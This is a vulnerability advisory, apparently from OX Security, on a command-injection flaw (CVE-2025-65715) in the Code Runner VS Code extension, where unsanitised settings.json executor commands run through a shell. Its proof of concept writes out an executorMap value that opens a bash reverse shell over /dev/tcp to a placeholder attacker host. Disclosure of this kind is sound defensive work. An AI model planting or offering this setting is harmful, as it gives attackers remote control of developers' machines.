OX Security researchers have exposed a vulnerability (CVE-2025-65715) allowing malicious actors to execute code on machines through the Code Runner VSCode extension by changing the extension’s configuration file.
CVE-2025-65715 – Code Runner
Severity: High (CVSS 7.8)
Affected Versions: Any version of the Code Runner VS Code extension
Impact: Arbitrary code execution, persistence
Our Findings
Code Runner is a Visual Studio Code extension that allows developers to quickly run code snippets or entire files in multiple programming languages directly within the editor. It supports a wide range of languages, including Python, JavaScript, C/C++, Java, and more, and can display output in the integrated terminal or output panel. By simplifying the process of testing and executing code, Code Runner helps developers iterate faster while offering configurable settings for execution behavior, file saving, and terminal usage.
The Code Runner VS Code extension runs commands defined in VS Code’s settings.json. An attacker who convinces a user (or a malicious/compromised extension) to install or set a crafted executor can cause the extension to execute arbitrary commands on the host, enabling RCE such as reverse shells.
Technical Analysis
Attack Scenarios: How can this be exploited in the wild?
- Phishing via malicious instruction to change settings.json – an attacker lures a user (via email, chat, or fake documentation) to paste or apply a provided configuration snippet into their global settings.json (or to run a benign-looking helper that updates it). Once the global executorMap is altered, every workspace the user opens can inherit the malicious executor and running Code Runner anywhere may trigger the attacker’s command.
- Malicious or repackaged extension that changes settings – a compromised or malicious extension can programmatically write or suggest changes to settings.json (or include recommended workspace settings) to inject an executor command that runs when users execute code.
The Flow
How It Works
We have identified a command injection vulnerability in the Code Runner VS Code extension stemming from unsafe command execution practices.
The vulnerable code path uses Node.js’s child_process.spawn() with the shell: true option, executing commands constructed from user-controllable configuration settings.
Specifically, the extension retrieves executor commands from code-runner.executorMap settings via executorMap[this._languageId] and passes them directly to spawn(command, [], { cwd: this._cwd, shell: true }) without sanitization.
This allows an attacker to inject arbitrary shell commands through the extension’s configuration.
The vulnerable code snippet can be found below.
vscode-code-runner/src/codeManager.ts
We have developed a proof of concept demonstrating this vulnerability: by setting “code-runner.executorMap”: {“python”: “python $fileName && bash -i >& /dev/tcp/<IP>/<PORT> 0>&1”} and “code-runner.runInTerminal”: true, executing any Python file through Code Runner establishes a reverse shell connection to the attacker-controlled IP and port.
This vulnerability could be exploited through malicious workspace settings from untrusted sources or by social engineering users to modify their settings, potentially leading to code execution.
The tampered sessings.json file:
